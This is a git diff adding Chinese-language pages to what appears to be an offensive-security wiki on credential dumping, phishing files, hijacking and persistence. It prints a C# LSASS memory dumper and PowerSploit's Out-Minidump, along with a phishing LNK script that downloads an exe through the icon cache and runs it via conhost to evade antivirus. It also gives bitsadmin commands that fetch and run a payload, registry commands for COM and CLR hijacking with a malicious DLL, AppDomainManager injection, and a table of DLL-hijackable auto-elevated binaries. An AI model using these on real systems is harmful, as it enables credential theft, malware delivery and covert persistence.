lsass).id c:\temp\lsass.dmp +``` + diff --git a/dump/shellcode.md b/dump/shellcode.md new file mode 100644 index 0000000..3c06176 --- /dev/null +++ b/dump/shellcode.md @@ -0,0 +1,6 @@ +# Shellcode + +参考链接: + +{% embed url="https://osandamalith.com/2019/05/11/shellcode-to-dump-the-lsass-process/" caption="" %} + diff --git a/dump/silentprocessexit.md b/dump/silentprocessexit.md new file mode 100644 index 0000000..cd0325c --- /dev/null +++ b/dump/silentprocessexit.md @@ -0,0 +1,6 @@ +# SilentProcessExit + +参考链接: + +{% embed url="https://github.com/deepinstinct/LsassSilentProcessExit" caption="" %} + diff --git a/dump/sqldumper.md b/dump/sqldumper.md new file mode 100644 index 0000000..2052490 --- /dev/null +++ b/dump/sqldumper.md @@ -0,0 +1,17 @@ +# Sqldumper + +Microsoft SQL附带的调试实用程序。 + +位置: + +* C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe +* C:\Program Files \(x86\)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe + +参考链接: + +{% embed url="https://docs.microsoft.com/en-US/troubleshoot/sql/tools/use-sqldumper-generate-dump-file" caption="" %} + +{% embed url="https://twitter.com/countuponsec/status/910969424215232518" caption="" %} + +{% embed url="https://twitter.com/countuponsec/status/910977826853068800" caption="" %} + diff --git a/dump/task-manager-process-explorer.md b/dump/task-manager-process-explorer.md new file mode 100644 index 0000000..653313f --- /dev/null +++ b/dump/task-manager-process-explorer.md @@ -0,0 +1,6 @@ +# Task Manager/Process Explorer + +任务管理器中 + +右键-创建转储文件 + diff --git a/dump/untitled.md b/dump/untitled.md new file mode 100644 index 0000000..c119131 --- /dev/null +++ b/dump/untitled.md @@ -0,0 +1,180 @@ +# MiniDumpWriteDump + +c\#: + +```csharp +using System; +using System.Collections.Generic; +using System.Diagnostics; +using System.IO; +using System.Runtime.InteropServices; +using System.Text; +using System.Threading; + +namespace MiniDumpWriteDump +{ + class Program + { + [DllImport("dbghelp.dll", EntryPoint = "MiniDumpWriteDump", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Unicode, ExactSpelling = true, SetLastError = true)] + static extern bool MiniDumpWriteDump(IntPtr hProcess, uint processId, SafeHandle OutFile, uint dumpType, IntPtr expParam, IntPtr userStreamParam, IntPtr callbackParam); + + static void Main(string[] args) + { + try + { + Process[] process = Process.GetProcessesByName(args[0]); + Console.WriteLine("Get Processes Handle is " + process[0].Handle); + Console.WriteLine("Get Processes Id is " + process[0].Id); + using (FileStream fs = new FileStream("7kb.tmp", FileMode.Create, FileAccess.ReadWrite, FileShare.Write)) + { + Console.WriteLine("Dump Status:" + MiniDumpWriteDump(process[0].Handle, (uint)process[0].Id, fs.SafeFileHandle, (uint)2, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero)); + } + } + catch (Exception) + { + Console.WriteLine("MiniDumpWriteDump.exe lsass"); + } + } + } +} +``` + +ps1: + +```text +function Out-Minidump +{ +<# +.SYNOPSIS + + Generates a full-memory minidump of a process. + + PowerSploit Function: Out-Minidump + Author: Matthew Graeber (@mattifestation) + License: BSD 3-Clause + Required Dependencies: None + Optional Dependencies: None + +.DESCRIPTION + + Out-Minidump writes a process dump file with all process memory to disk. + This is similar to running procdump.exe with the '-ma' switch. + +.PARAMETER Process + + Specifies the process for which a dump will be generated. The process object + is obtained with Get-Process. + +.PARAMETER DumpFilePath + + Specifies the path where dump files will be written. By default, dump files + are written to the current working directory. Dump file names take following + form: processname_id.dmp + +.EXAMPLE + + Out-Minidump -Process (Get-Process -Id 4293) + + Description + ----------- + Generate a minidump for process ID 4293. + +.EXAMPLE + + Get-Process lsass | Out-Minidump + + Description + ----------- + Generate a minidump for the lsass process. Note: To dump lsass, you must be + running from an elevated prompt. + +.EXAMPLE + + Get-Process | Out-Minidump -DumpFilePath C:\temp + + Description + ----------- + Generate a minidump of all running processes and save them to C:\temp. + +.INPUTS + + System.Diagnostics.Process + + You can pipe a process object to Out-Minidump. + +.OUTPUTS + + System.IO.FileInfo + +.LINK + + http://www.exploit-monday.com/ +#> + + [CmdletBinding()] + Param ( + [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True)] + [System.Diagnostics.Process] + $Process, + + [Parameter(Position = 1)] + [ValidateScript({ Test-Path $_ })] + [String] + $DumpFilePath = $PWD + ) + + BEGIN + { + $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') + $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') + $Flags = [Reflection.BindingFlags] 'NonPublic, Static' + $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) + $MiniDumpWithFullMemory = [UInt32] 2 + } + + PROCESS + { + $ProcessId = $Process.Id + $ProcessName = $Process.Name + $ProcessHandle = $Process.Handle + $ProcessFileName = "$($ProcessName)_$($ProcessId).dmp" + + $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName + + $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) + + $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, + $ProcessId, + $FileStream.SafeFileHandle, + $MiniDumpWithFullMemory, + [IntPtr]::Zero, + [IntPtr]::Zero, + [IntPtr]::Zero)) + + $FileStream.Close() + + if (-not $Result) + { + $Exception = New-Object ComponentModel.Win32Exception + $ExceptionMessage = "$($Exception.Message) ($($ProcessName):$($ProcessId))" + + # Remove any partially written dump files. For example, a partial dump will be written + # in the case when 32-bit PowerShell tries to dump a 64-bit process. + Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue + + throw $ExceptionMessage + } + else + { + Get-ChildItem $ProcessDumpPath + } + } + + END {} +} +``` + +参考链接: + +{% embed url="https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1" caption="" %} + diff --git a/dump/winpmem.md b/dump/winpmem.md new file mode 100644 index 0000000..8c79be7 --- /dev/null +++ b/dump/winpmem.md @@ -0,0 +1,6 @@ +# WinPmem + +参考链接: + +{% embed url="https://github.com/FSecureLABS/physmem2profit" caption="" %} + diff --git a/file/chm/README.md b/file/chm/README.md new file mode 100644 index 0000000..8e3b868 --- /dev/null +++ b/file/chm/README.md @@ -0,0 +1,2 @@ +# CHM + diff --git a/file/chm/phishing-chm.md b/file/chm/phishing-chm.md new file mode 100644 index 0000000..38b6c58 --- /dev/null +++ b/file/chm/phishing-chm.md @@ -0,0 +1,28 @@ +# 钓鱼chm + +```markup + + + +New Item + + + + + + + + +``` + +推荐使用WinCHM制作,msi文件自行打包制作,注意不能选择管理员权限 + diff --git a/file/lnk/README.md b/file/lnk/README.md new file mode 100644 index 0000000..31cf7f6 --- /dev/null +++ b/file/lnk/README.md @@ -0,0 +1,8 @@ +# LNK + +待整理 + +参考文章: + +{% embed url="https://bbs.pediy.com/thread-260953.htm" caption="" %} + diff --git a/file/lnk/phishing-lnk.md b/file/lnk/phishing-lnk.md new file mode 100644 index 0000000..fe5d811 --- /dev/null +++ b/file/lnk/phishing-lnk.md @@ -0,0 +1,19 @@ +# 钓鱼lnk + +```text +$shell = New-Object -ComObject WScript.Shell; +$desktop = [System.Environment]::GetFolderPath('Desktop'); +$shortcut = $shell.CreateShortcut("$desktop\qwqdanchun.lnk"); +$shortcut.TargetPath = "C:\windows\system32\conhost.exe"; +$shortcut.WindowStyle = 7; +$shortcut.Arguments = 'cmd.exe /c cd %USERPROFILE%\AppData\Local\Microsoft\Windows\INetCache & dir /s /B qwqdanchun*.exe | cmd.exe /k'; +$shortcut.IconLocation = "https://127.0.0.1/qwqdanchun.exe?.ico"; +$shortcut.Save(); +``` + +利用icon缓存来下载文件,并用conhost绕过杀软对进程链的判断。(仅适用于win10,win7等缓存目录不同,有兴趣可以自行编写) + +参考文章: + +{% embed url="https://isc.sans.edu/forums/diary/Using+Shell+Links+as+zerotouch+downloaders+and+to+initiate+network+connections/26276/" caption="" %} + diff --git a/file/office.md b/file/office.md new file mode 100644 index 0000000..d93e5e7 --- /dev/null +++ b/file/office.md @@ -0,0 +1,20 @@ +# Office + +待整理 + +参考文章: + +{% embed url="https://www.anquanke.com/post/id/175548" caption="" %} + +{% embed url="https://docs.microsoft.com/zh-cn/deployoffice/compat/office-file-format-reference" caption="" %} + +{% embed url="https://docs.microsoft.com/zh-cn/previous-versions/office/gg615407%28v=office.14%29" caption="" %} + +{% embed url="https://github.com/dotnetcore/NPOI" caption="" %} + +{% embed url="https://github.com/xceedsoftware/DocX" caption="" %} + +{% embed url="https://github.com/Sicos1977/OfficeExtractor" caption="" %} + +{% embed url="https://github.com/EvotecIT/PSWriteWord" caption="" %} + diff --git a/file/pe.md b/file/pe.md new file mode 100644 index 0000000..ab308e3 --- /dev/null +++ b/file/pe.md @@ -0,0 +1,8 @@ +# PE + +待整理 + +参考文章: + +{% embed url="https://bbs.pediy.com/thread-121488.htm" caption="" %} + diff --git a/get-password/inject-mstsc.exe.md b/get-password/inject-mstsc.exe.md new file mode 100644 index 0000000..8b05b5d --- /dev/null +++ b/get-password/inject-mstsc.exe.md @@ -0,0 +1,6 @@ +# 注入mstsc.exe + +窃取远程桌面连接密码 + +{% embed url="https://github.com/0x09AL/RdpThief" caption="" %} + diff --git a/get-password/mimikatz.md b/get-password/mimikatz.md new file mode 100644 index 0000000..dda8813 --- /dev/null +++ b/get-password/mimikatz.md @@ -0,0 +1,6 @@ +# Mimikatz + +Mimikatz + +{% embed url="https://github.com/gentilkiwi/mimikatz/" caption="" %} + diff --git a/get-password/nplogonnotify.md b/get-password/nplogonnotify.md new file mode 100644 index 0000000..5df1afd --- /dev/null +++ b/get-password/nplogonnotify.md @@ -0,0 +1,6 @@ +# NPLogonNotify + +参考链接: + +{% embed url="https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy" caption="" %} + diff --git a/get-password/smb.md b/get-password/smb.md new file mode 100644 index 0000000..9ad02f8 --- /dev/null +++ b/get-password/smb.md @@ -0,0 +1,10 @@ +# SMB + +使用恶意主题来窃取密码 + +{% embed url="https://www.bleepingcomputer.com/news/microsoft/windows-10-themes-can-be-abused-to-steal-windows-passwords/" caption="" %} + +利用恶意pdf文件来窃取密码 + +{% embed url="https://research.checkpoint.com/2018/ntlm-credentials-theft-via-pdf-files/" caption="" %} + diff --git a/get-password/tickets.md b/get-password/tickets.md new file mode 100644 index 0000000..df8312a --- /dev/null +++ b/get-password/tickets.md @@ -0,0 +1,6 @@ +# Tickets + +Silver Tickets、Golden Tickets + +{% embed url="https://en.hackndo.com/kerberos-silver-golden-tickets/" caption="" %} + diff --git a/inject/inject.md b/inject/inject.md new file mode 100644 index 0000000..873a011 --- /dev/null +++ b/inject/inject.md @@ -0,0 +1,8 @@ +# 注入 + +## 原理: + +这篇文章讲的非常详细,重新整理一遍意义不大,直接看原文吧。 + +{% embed url="https://www.elastic.co/cn/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" caption="" %} + diff --git a/lateral-movement/dcom.md b/lateral-movement/dcom.md new file mode 100644 index 0000000..8a7653f --- /dev/null +++ b/lateral-movement/dcom.md @@ -0,0 +1,2 @@ +# DCOM + diff --git a/lateral-movement/hash.md b/lateral-movement/hash.md new file mode 100644 index 0000000..09b4fad --- /dev/null +++ b/lateral-movement/hash.md @@ -0,0 +1,2 @@ +# HASH + diff --git a/lateral-movement/kerberos-tickets.md b/lateral-movement/kerberos-tickets.md new file mode 100644 index 0000000..e6db80a --- /dev/null +++ b/lateral-movement/kerberos-tickets.md @@ -0,0 +1,2 @@ +# Kerberos tickets + diff --git a/lateral-movement/rpc.md b/lateral-movement/rpc.md new file mode 100644 index 0000000..912466b --- /dev/null +++ b/lateral-movement/rpc.md @@ -0,0 +1,2 @@ +# RPC + diff --git a/lateral-movement/wmi.md b/lateral-movement/wmi.md new file mode 100644 index 0000000..4e74a94 --- /dev/null +++ b/lateral-movement/wmi.md @@ -0,0 +1,2 @@ +# WMI + diff --git a/persistence/bits-jobs/README.md b/persistence/bits-jobs/README.md new file mode 100644 index 0000000..9a27fee --- /dev/null +++ b/persistence/bits-jobs/README.md @@ -0,0 +1,2 @@ +# BITS Jobs + diff --git a/persistence/bits-jobs/bits.md b/persistence/bits-jobs/bits.md new file mode 100644 index 0000000..2ec3ad6 --- /dev/null +++ b/persistence/bits-jobs/bits.md @@ -0,0 +1,18 @@ +# BITS + +## BITS + +后台智能传输服务,它可以促进文件到Web服务器(HTTP)和共享文件夹(SMB)的传输能力。 + +可以滥用此功能,以便在受感染的主机上下载有效负载(可执行文件,PowerShell脚本,Scriptlet等)并在给定时间执行这些文件 + +## 新建BITS Jobs后门 + +```text +bitsadmin /create qwqdanchun +bitsadmin /addfile qwqdanchun "http://127.0.0.1/qwqdanchun.exe" "C:\Temp\qwqdanchun.exe" +bitsadmin /SetNotifyCmdLine qwqdanchun C:\Temp\qwqdanchun.exe NUL +bitsadmin /SetMinRetryDelay "qwqdanchun" 60 +bitsadmin /resume qwqdanchun +``` + diff --git a/persistence/com-hijack/README.md b/persistence/com-hijack/README.md new file mode 100644 index 0000000..adc949a --- /dev/null +++ b/persistence/com-hijack/README.md @@ -0,0 +1,2 @@ +# COM劫持 + diff --git a/persistence/com-hijack/com-hijack.md b/persistence/com-hijack/com-hijack.md new file mode 100644 index 0000000..61db1e7 --- /dev/null +++ b/persistence/com-hijack/com-hijack.md @@ -0,0 +1,100 @@ +# COM劫持 + +## COM组件 + +COM是Windows中的一个系统,用于在操作系统和软件组件之间进行交互,对各种COM对象的引用存储在注册表中。劫持COM对象需要在注册表中进行更改,以替换对合法系统组件的引用,这可能导致该组件在执行时不起作用。 + +## 劫持CLR + +CLR全称Common Language Runtime,中文名称为公共语言运行时。 + +CLR是.NET Framework的主要执行引擎,作用之一是监视程序的运行。 + +在CLR之下运行的程序属于managed,不在CLR之下直接运行的程序属于native。 + +此处主要以CLR的劫持作为实例,因为其本质也是COM劫持,但因为本身的特殊性经常被单独拿来说。 + +```text +#32bit +wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="%username%",VariableValue="1" +wmic ENVIRONMENT create name="COR_PROFILER",username="%username%",VariableValue="{11111111-1111-1111-1111-111111111111}" +SET KEY=HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32 +REG.EXE ADD %KEY% /VE /T REG_SZ /D "C:\Temp\qwqdanchun.dll" /F +REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F +#64bit +wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="%username%",VariableValue="1" +wmic ENVIRONMENT create name="COR_PROFILER",username="%username%",VariableValue="{11111111-1111-1111-1111-111111111111}" +SET KEY=HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32 +REG.EXE ADD %KEY% /VE /T REG_SZ /D "C:\Temp\qwqdanchun.dll" /F +REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F +SET KEY=HKEY_CURRENT_USER\Software\Classes\WoW6432Node\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32 +REG.EXE ADD %KEY% /VE /T REG_SZ /D "C:\Temp\qwqdanchun.dll" /F +REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F +``` + +参考文章: + +{% embed url="https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html" caption="" %} + +## 劫持其他COM组件 + +操作的话,与CLR劫持相同,但是不再需要更改环境变量,少了一步敏感操作,具体使用自行取舍。 + +示例命令行: + +```text +SET KEY=HKEY_CURRENT_USER\Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32 +REG.EXE ADD %KEY% /T REG_SZ /D "C:\Temp\qwqdanchun.dll" /F +REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F +``` + +原理类似,故只列出常用的几个CLSID。 + +| CLSID | +| :--- | +| {42aedc87-2188-41fd-b9a3-0c966feabec1} | +| {fbeb8a05-beee-4442-804e-409d6c4515e9} | +| {b5f8350b-0548-48b1-a6ee-88bd00b4a5e7} | +| {BCDE0395-E52F-467C-8E3D-C4579291692E} | +| {F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1} | +| {3543619C-D563-43f7-95EA-4DA7E1CC396A} | +| {B056521A-9B10-425E-B616-1FCD828DB3B1} | +| {EFEF7FDB-0CED-4FB6-B3BB-3C50D39F4120} | +| {93E5752E-B889-47C5-8545-654EE2533C64} | +| {56FDF344-FD6D-11D0-958A-006097C9A090} | +| {2163EB1F-3FD9-4212-A41F-81D1F933597F} | +| {A6A2383F-AD50-4D52-8110-3508275E77F7} | +| {F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3} | +| {88D96A05-F192-11D4-A65F-0040963251E5} | +| {807583E5-5146-11D5-A672-00B0D022E945} | +| {529A9E6B-6587-4F23-AB9E-9C7D683E3C50} | +| {3CE74DE4-53D3-4D74-8B83-431B3828BA53} | +| {A4B544A1-438D-4B41-9325-869523E2D6C7} | +| {33C53A50-F456-4884-B049-85FD643ECFED} | +| {C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6} | +| {275C23E2-3747-11D0-9FEA-00AA003F8646} | +| {C15BB852-6F97-11D3-A990-00104B2A619F} | +| {ED475410-B0D6-11D2-8C3B-00104B2A6676} | +| {1299CF18-C4F5-4B6A-BB0F-2299F0398E27} | +| {DCB00C01-570F-4A9B-8D69-199FDBA5723B} | +| {C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6} | +| {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} | + +自行寻找的话只需要去看下面两个注册表位置即可 + +```text +HKCU\Software\Classes\CLSID\HKCU\Software\Classes\Wow6432Node\CLSID\ +``` + +## 一些特殊技巧 + +TreatAs(可以模拟其他类的CLSID。) + +{% embed url="https://docs.microsoft.com/en-us/windows/win32/com/treatas" caption="" %} + +利用零宽字节特性,在Process Explorer等分析软件中隐藏劫持dll + +{% embed url="https://en.wikipedia.org/wiki/Zero-width\_space" caption="" %} + +{% embed url="https://fatrodzianko.com/2020/03/08/dll-side-loading-and-zero-width-spaces/" caption="" %} + diff --git a/persistence/dll-hijack/README.md b/persistence/dll-hijack/README.md new file mode 100644 index 0000000..2f4aa5f --- /dev/null +++ b/persistence/dll-hijack/README.md @@ -0,0 +1,2 @@ +# DLL劫持 + diff --git a/persistence/dll-hijack/hijack-.net-program.md b/persistence/dll-hijack/hijack-.net-program.md new file mode 100644 index 0000000..d219aa5 --- /dev/null +++ b/persistence/dll-hijack/hijack-.net-program.md @@ -0,0 +1,57 @@ +# 劫持.NET程序 + +## 劫持.NET程序(AppDomainManager) + +### 首先制作要加载的恶意程序 + +C\#: + +```csharp +using System; +using System.Windows.Forms; +public sealed class MyAppDomainManager : AppDomainManager +{ + public override void InitializeNewDomain(AppDomainSetup appDomainInfo) + { + MessageBox.Show("AppDomainManager Injection"); + return; + } +} +``` + +之后将其编译为qwqdanchun.dll。 + +### 注入方法一: + +命令行设置环境变量: + +```text +set APPDOMAIN_MANAGER_ASM=qwqdanchun, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null +set APPDOMAIN_MANAGER_TYPE=MyAppDomainManager +``` + +之后将qwqdanchun.dll与.net文件放在同一目录即可。 + +### 注入方法二: + +寻找要注入的exe文件(此处示例使用qwqdanchun.exe),并将做好的dll与其置于同一目录,再将如下配置文件写入qwqdanchun.exe.config文件即可。 + +```markup + + + + + + + + + + +``` + +参考文章: + +{% embed url="https://web.archive.org/web/20170919060201/http://subt0x10.blogspot.com/2017/06/attacking-clr-appdomainmanager-injection.html" caption="" %} + +{% embed url="https://pentestlaboratories.com/tag/appdomainmanager-injection/" caption="" %} + diff --git a/persistence/dll-hijack/hijack-autorun-programs.md b/persistence/dll-hijack/hijack-autorun-programs.md new file mode 100644 index 0000000..438568d --- /dev/null +++ b/persistence/dll-hijack/hijack-autorun-programs.md @@ -0,0 +1,1603 @@ +# 劫持自启动程序 + +## **原理:** + +通过篡改、替换或代理原dll文件来达到劫持。 + +## 方法: + +1.DLL替换:用恶意DLL替换合法的DLL。 +2.DLL搜索顺序劫持:在应用程序指定的不带路径的DLL中。根据搜索顺序,将恶意DLL放在实际DLL之前的搜索位置。大部分时候都是目标应用程序的工作目录。(微软文档:[https://docs.microsoft.com/zh-cn/windows/win32/dlls/dynamic-link-library-search-order)](https://docs.microsoft.com/zh-cn/windows/win32/dlls/dynamic-link-library-search-order%EF%BC%89) +3.Phantom DLL劫持:丢弃一个恶意的DLL来代替合法应用程序尝试加载的丢失/不存在的DLL。 +4.DLL重定向:通过编辑,改变DLL被搜索的位置,例如%PATH%环境变量,或.exe.manifest/.exe.local文件。 +5.WinSxS DLL替换:用恶意DLL替换WinSxS文件夹中合法的DLL。 +6.相对路径DLL劫持:将合法的应用程序复制到用户可写文件夹中,并添加恶意DLL。 + +## 实际使用: + +寻找开机自启的exe文件,并使用Process Explorer寻找是否有not found的dll文件,有的话直接放在对应位置(顺便提交拿一个CVE),没有就替换正常要加载的dll。建议做一个dll转发来保证程序正常运行。 +厚颜无耻的放一个自己的文章: + +{% embed url="https://bbs.pediy.com/thread-265287.htm" caption="" %} + +可以考虑搭配下面这个文章实现user权限的劫持 + +{% embed url="https://secret.club/2020/07/01/diagtrack.html" caption="" %} + +## 附表 + +此处列出“c:\windows\system32”中易受DLL Hijacking的所有可执行文件。每个可执行文件的旁边是一个或多个可以被劫持的DLL,以及被调用的DLL的函数,可以方便的进行利用。 + +来源: + +{% embed url="https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows" caption="" %} + +| Auto-elevated | Executable | DLL | Procedure | +| :--- | :--- | :--- | :--- | +| ✔️ | bthudtask.exe | DEVOBJ.dll | DllMain | +| ✔️ | computerdefaults.exe | CRYPTBASE.DLL | DllMain | +| ✔️ | computerdefaults.exe | edputil.dll | DllMain | +| ✔️ | computerdefaults.exe | edputil.dll | EdpGetIsManaged | +| ✔️ | computerdefaults.exe | MLANG.dll | ConvertINetUnicodeToMultiByte | +| ✔️ | computerdefaults.exe | MLANG.dll | DllMain | +| ✔️ | computerdefaults.exe | PROPSYS.dll | DllMain | +| ✔️ | computerdefaults.exe | PROPSYS.dll | PSCreateMemoryPropertyStore | +| ✔️ | computerdefaults.exe | PROPSYS.dll | PSPropertyBag\_WriteDWORD | +| ✔️ | computerdefaults.exe | Secur32.dll | DllMain | +| ✔️ | computerdefaults.exe | SSPICLI.DLL | DllMain | +| ✔️ | computerdefaults.exe | SSPICLI.DLL | GetUserNameExW | +| ✔️ | computerdefaults.exe | WININET.dll | DllMain | +| ✔️ | computerdefaults.exe | WININET.dll | GetUrlCacheEntryBinaryBlob | +| ✔️ | dccw.exe | ColorAdapterClient.dll | DllMain | +| ✔️ | dccw.exe | dxva2.dll | DllMain | +| ✔️ | dccw.exe | mscms.dll | DccwReleaseDisplayProfileAssociationList | +| ✔️ | dccw.exe | mscms.dll | DllMain | +| ✔️ | dccw.exe | mscms.dll | WcsGetCalibrationManagementState | +| ✔️ | dccw.exe | mscms.dll | WcsSetCalibrationManagementState | +| ✔️ | dccw.exe | USERENV.dll | DllMain | +| ✔️ | easinvoker.exe | AUTHZ.dll | DllMain | +| ✔️ | easinvoker.exe | netutils.dll | DllMain | +| ✔️ | easinvoker.exe | samcli.dll | DllMain | +| ✔️ | easinvoker.exe | SAMLIB.dll | DllMain | +| ✔️ | easpolicymanagerbrokerhost.exe | InprocLogger.dll | DllMain | +| ✔️ | easpolicymanagerbrokerhost.exe | InprocLogger.dll | FlushInProcTraceSession | +| ✔️ | easpolicymanagerbrokerhost.exe | InprocLogger.dll | InitializeInProcLogger | +| ✔️ | easpolicymanagerbrokerhost.exe | InprocLogger.dll | InitializeInProcTraceFlushTrigger | +| ✔️ | easpolicymanagerbrokerhost.exe | InprocLogger.dll | InitializeInProcTraceSession | +| ✔️ | easpolicymanagerbrokerhost.exe | InprocLogger.dll | ShutdownInProcLogger | +| ✔️ | easpolicymanagerbrokerhost.exe | InprocLogger.dll | ShutdownInProcTraceSession | +| ✔️ | easpolicymanagerbrokerhost.exe | InprocLogger.dll | StopInProcTraceSession | +| ✔️ | easpolicymanagerbrokerhost.exe | policymanager.dll | DllMain | +| ✔️ | fodhelper.exe | CRYPTBASE.DLL | DllMain | +| ✔️ | fodhelper.exe | edputil.dll | DllMain | +| ✔️ | fodhelper.exe | edputil.dll | EdpGetIsManaged | +| ✔️ | fodhelper.exe | MLANG.dll | ConvertINetUnicodeToMultiByte | +| ✔️ | fodhelper.exe | MLANG.dll | DllMain | +| ✔️ | fodhelper.exe | PROPSYS.dll | DllMain | +| ✔️ | fodhelper.exe | PROPSYS.dll | PSCreateMemoryPropertyStore | +| ✔️ | fodhelper.exe | PROPSYS.dll | PSPropertyBag\_WriteDWORD | +| ✔️ | fodhelper.exe | Secur32.dll | DllMain | +| ✔️ | fodhelper.exe | SSPICLI.DLL | DllMain | +| ✔️ | fodhelper.exe | SSPICLI.DLL | GetUserNameExW | +| ✔️ | fodhelper.exe | WININET.dll | DllMain | +| ✔️ | fodhelper.exe | WININET.dll | GetUrlCacheEntryBinaryBlob | +| ✔️ | fsavailux.exe | DEVOBJ.dll | DllMain | +| ✔️ | fxsunatd.exe | FXSAPI.dll | DllMain | +| ✔️ | fxsunatd.exe | FXSAPI.dll | FaxConnectFaxServerW | +| ✔️ | fxsunatd.exe | IPHLPAPI.DLL | DllMain | +| ✔️ | fxsunatd.exe | PROPSYS.dll | DllMain | +| ✔️ | immersivetpmvscmgrsvr.exe | DEVOBJ.dll | DllMain | +| ✔️ | iscsicli.exe | DEVOBJ.dll | DllMain | +| ✔️ | iscsicli.exe | ISCSIDSC.dll | DllMain | +| ✔️ | iscsicli.exe | ISCSIDSC.dll | GetIScsiVersionInformation | +| ✔️ | iscsicli.exe | ISCSIUM.dll | DiscpAllocMemory | +| ✔️ | iscsicli.exe | ISCSIUM.dll | DiscpRegisterHeap | +| ✔️ | iscsicli.exe | ISCSIUM.dll | DllMain | +| ✔️ | iscsicli.exe | WMICLNT.dll | DllMain | +| ✔️ | mdsched.exe | bcd.dll | DllMain | +| ✔️ | mschedexe.exe | MaintenanceUI.dll | DllMain | +| ✔️ | msconfig.exe | ATL.DLL | AtlModuleInit | +| ✔️ | msconfig.exe | ATL.DLL | AtlModuleRegisterClassObjects | +| ✔️ | msconfig.exe | ATL.DLL | DllMain | +| ✔️ | msconfig.exe | bcd.dll | DllMain | +| ✔️ | msdt.exe | ATL.DLL | DllMain | +| ✔️ | msdt.exe | Cabinet.dll | DllMain | +| ✔️ | msdt.exe | SSPICLI.DLL | DllMain | +| ✔️ | msdt.exe | UxTheme.dll | DllMain | +| ✔️ | msdt.exe | wer.dll | DllMain | +| ✔️ | msdt.exe | WINHTTP.dll | DllMain | +| ✔️ | multidigimon.exe | NInput.dll | DllMain | +| ✔️ | netplwiz.exe | CRYPTBASE.dll | DllMain | +| ✔️ | netplwiz.exe | DSROLE.dll | DllMain | +| ✔️ | netplwiz.exe | DSROLE.dll | DsRoleGetPrimaryDomainInformation | +| ✔️ | netplwiz.exe | NETPLWIZ.dll | DllMain | +| ✔️ | netplwiz.exe | NETPLWIZ.dll | UsersRunDllW | +| ✔️ | netplwiz.exe | netutils.dll | DllMain | +| ✔️ | netplwiz.exe | netutils.dll | NetApiBufferFree | +| ✔️ | netplwiz.exe | PROPSYS.dll | DllMain | +| ✔️ | netplwiz.exe | samcli.dll | DllMain | +| ✔️ | netplwiz.exe | samcli.dll | NetUserGetInfo | +| ✔️ | netplwiz.exe | SAMLIB.dll | DllMain | +| ✔️ | netplwiz.exe | SAMLIB.dll | SamConnect | +| ✔️ | netplwiz.exe | SAMLIB.dll | SamEnumerateDomainsInSamServer | +| ✔️ | netplwiz.exe | SAMLIB.dll | SamFreeMemory | +| ✔️ | optionalfeatures.exe | DUI70.dll | DllMain | +| ✔️ | optionalfeatures.exe | DUI70.dll | InitProcessPriv | +| ✔️ | optionalfeatures.exe | DUI70.dll | RegisterBaseControls | +| ✔️ | optionalfeatures.exe | DUI70.dll | RegisterCommonControls | +| ✔️ | optionalfeatures.exe | DUI70.dll | RegisterExtendedControls | +| ✔️ | optionalfeatures.exe | DUI70.dll | RegisterStandardControls | +| ✔️ | optionalfeatures.exe | msi.dll | DllMain | +| ✔️ | optionalfeatures.exe | OLEACC.dll | CreateStdAccessibleObject | +| ✔️ | optionalfeatures.exe | OLEACC.dll | DllMain | +| ✔️ | optionalfeatures.exe | OLEACC.dll | GetRoleTextW | +| ✔️ | optionalfeatures.exe | osbaseln.dll | CloseOsBaseline | +| ✔️ | optionalfeatures.exe | osbaseln.dll | DllMain | +| ✔️ | optionalfeatures.exe | osbaseln.dll | OpenOsBaseline | +| ✔️ | optionalfeatures.exe | PROPSYS.dll | DllMain | +| ✔️ | perfmon.exe | ATL.DLL | DllMain | +| ✔️ | perfmon.exe | credui.dll | DllMain | +| ✔️ | perfmon.exe | SspiCli.dll | DllMain | +| ✔️ | printui.exe | IPHLPAPI.DLL | DllMain | +| ✔️ | printui.exe | printui.dll | DllMain | +| ✔️ | printui.exe | printui.dll | PrintUIEntryW | +| ✔️ | printui.exe | PROPSYS.dll | DllMain | +| ✔️ | printui.exe | puiapi.dll | DllMain | +| ✔️ | recdisc.exe | bcd.dll | DllMain | +| ✔️ | recdisc.exe | Cabinet.dll | DllMain | +| ✔️ | recdisc.exe | ReAgent.dll | DllMain | +| ✔️ | rstrui.exe | bcd.dll | DllMain | +| ✔️ | rstrui.exe | ktmw32.dll | DllMain | +| ✔️ | rstrui.exe | SPP.dll | DllMain | +| 